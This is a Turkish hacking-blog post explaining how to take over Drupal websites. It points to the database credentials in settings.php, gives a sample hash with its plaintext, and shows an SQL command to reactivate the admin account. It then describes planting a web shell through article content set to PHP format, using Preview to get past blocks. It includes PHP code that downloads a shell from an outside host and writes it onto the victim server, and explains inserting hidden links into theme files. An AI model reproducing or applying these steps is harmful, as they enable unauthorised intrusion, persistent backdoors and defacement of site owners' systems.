PHP HTML Webmaster Web tasarım kişisel blog hosting Linux Plesk Hack shell Alfa Shell Bypass Shell Warez Scriptler Warez Scriptler PHP Scriptleri Wordpress Temaları Hacking Blog Local Root Exploit Film Scripti Blog Scripti Kızların numarasını alma yöntemi Kızların numarasını alın Spotify Premium Account Hacker Eğitim Seti
hacking security blog local root exploits teknoloji blogu turkish hack blog hack tools İnternetsiz Whatsapp Kullanmak Whatsapp internetsiz kullanmak Whatsapp Engelleyen Kişiye Mesaj Gönderme WhatsApp'ta Sizi Engelleyen Kişiye Mesaj Atabilirsiniz! kızların numarası nasıl alınır? Link.tl reklam geçme Link.tl reklamları atlama Ttnet datası Film scripti Film teması dizi teması cpanel portları yasaklamak İnstagram Fake Script Steam bedava oyun alma Sqlmap kullanımı Gizli Numarayı Bulmak 2017 Exploit Facebook Hesabını Kalıcı Olarak Silme Hız Ölçme Scripti Wordpress Dizi ve Film Teması Wordpress Dizi Teması Film Scripti Script paylaşım scripti Hacker Eğitim Seti Trojan nasıl temizlenir?
Ana Sayfa / Eğitim / Drupal Detayları

Drupal Detayları

Drupal siteler önceden güvenilir bir cms olarak ön planda idi ancak son senelerde birçok açığı tespit edildi , otomatik şifre resetleyiciye kadar (eski token açığı gibi)..

Drupal sitelerin config dosyaları biraz şaşırtıcıdır , db adı şifre gibi bilgileri array içinde yer alır , config dosyasının bulunduğu konum ise şöyledir /sites/default/settings.php

örnek config kısmı

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'amis2min_amisdb',
      'username' => 'amis2min_amisdb',
      'password' => 'amisdb',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

örnek drupalşifre hash : $S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu = admin

mysql execute ile adminin üyeliğinin yasağını kaldırmak.

UPDATE users SET status = 1 WHERE uid=1;

Drupal sitelerin admin paneline girdikten sonra shell yüklemek içni herhangi bir upload alanı yoktur bu yüzden content kısmından yani makale eklenen kısımdan makale yerine shell kodlarınızı yapıştırmanız gerekir ve ayrıca text format kısmını PHP code olarak değiştirmeniz gerekir böylece shell kodlarınızı yolladığınız makale sayfasında çalıştırabilesiniz. Bazı drupal sitelerde shell kodlarını girdikten sonra sayfayı yolla demenize rağmen hata verebilir ve bir güvenlik önlemi alınmış olup makaleyi yollamanıza izin vermeyebilir , böyle durumlarda Preview (önizleme) özelliğini kullanmalısınız. Ön izleme sayesinde makaleyi yollamadan php kodunu test sayfasında çalıştırabilirsiniz , ancak bu test sayfasında shell çalıştırmanız sizin bir işinize yaramaz çünki herhangi bir butona tıkladığınız anda shell geçersiz konuma düşecektir ! bu sebepten tek çalıştırmalık bir kod hazırlamanız gerekmekte , yani preview dediğiniz anda siteye dışardan shelli çekip yüklemiş olsun , aşağıdaki örnek koda bakabilirsiniz.

$file = file_get_contents('http://w0rms.com/shell/angel.txt');
$b = fopen('angel.php', 'w');
fwrite($b,$file);
fclose($b);
print 'Başarılı ! <a href=angel.php></a>';

Drupal sitelere linkini eklemek istiyorsanız tema dosyası içinden html.tpl.php dosyasına eklemeniz yeterli olacaktır. eğer mysqldan eklemek istiyorsanız block_custom tablosu işinizi görecektir.

About Editör Reis

Ayrıca bakınız

Bir Hacker Hedef Hakkında Nasıl Bilgi Toplar?

Merhaba arkadaşlar bügün sizlere bir hacker hedef hakkında nasıl bilgi toplar ondan bahsedeceğiz. Arama Motorları: …

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir